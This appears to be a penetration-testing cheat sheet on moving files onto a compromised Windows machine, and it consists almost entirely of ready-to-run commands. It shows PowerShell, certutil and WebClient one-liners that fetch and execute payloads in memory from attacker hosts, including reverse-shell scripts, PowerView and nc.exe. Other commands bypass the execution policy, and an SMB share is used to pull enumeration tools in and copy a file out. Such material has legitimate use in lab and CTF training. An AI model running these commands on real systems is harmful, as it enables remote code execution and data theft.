# Windows

## IWR (Invoke Web Request) <a href="#iwr-invoke-web-request" id="iwr-invoke-web-request"></a>

```
powershell.exe Invoke-WebRequest https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1 -OutFile PowerView.ps1

powershell.exe -command iwr -Uri http://192.168.1.2/putty.exe -OutFile C:\Temp\putty.exe "
```

## System.Net.WebClient <a href="#system.net.webclient" id="system.net.webclient"></a>

```
powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://192.168.1.2/putty.exe', 'putty.exe')
```

## Certutils

```
certutil.exe -urlcache -split -f http://10.0.0.5/40564.exe bad.exe
```

## IEX

Instead of downloading to disk, the payload can instead be executed in memory, using Invoke-Expression, or the alias **iex**.

```
powershell.exe iex (New-Object Net.WebClient).DownloadString('http://192.168.119.193:8000/ps-sudo.ps1')
```

IEX also accepts pipeline input.

```
powershell Invoke-WebRequest http://10.10.16.26/rev.ps1 | iex
```

### Internet Explorer Basic Parsing <a href="#internet-explorer-basic-parsing" id="internet-explorer-basic-parsing"></a>

There may be cases when the Internet Explorer first-launch configuration has not been completed, which prevents the download.

![](https://851323342-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FolGZmSV9EYkU0MXXM4LC%2Fuploads%2FG0SInQCUwcDTwi2QKSKH%2Fimage.png?alt=media\&token=239c7e06-5091-4c6a-a3e4-376e23282f0d)

This can be bypassed using the parameter `-UseBasicParsing`.

```
powershell Invoke-WebRequest https://<ip>/PowerView.ps1 -UseBasicParsing | iex
```

### Escaping shell <a href="#escaping-shell" id="escaping-shell"></a>

If you ever encounter error regarding slash while supplying any of above command\
**Incorrect syntax near '/'.**\
Use `/` to escape it -

```
powershell.exe IEX (New-ObjectNet.WebClient).DownloadString(\"http://10.10.16.26:8000/rev.ps1\")
```

## Script

* if above command get **blocked** we can make **ps script**&#x20;

  that will download our file
* run following commands in victim :

```
echo $storageDir = $pwd > wget.ps1
echo $webclient = New-Object System.Net.WebClient >> wget.ps1
echo $url = "[http://ATTACKER_IP/nc.exe"](http://ATTACKER_IP/nc.exe) >> wget.ps1
echo $file = "nc.exe" >> wget.ps1
echo $webclient.DownloadFile($url,$file) >> wget.ps1
```

Execution of script

```
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1
```

## SMB

**Attacker**

```
smbserver.py root /tmp
```

**Target**

```
dir \\Attacker_ip\root
# will list out all files

copy \\0.0.0.0\root\winPEASx86.exe .
# To download from our machine

copy user.txt \\0.0.0.0\root
# To upload file to our box
```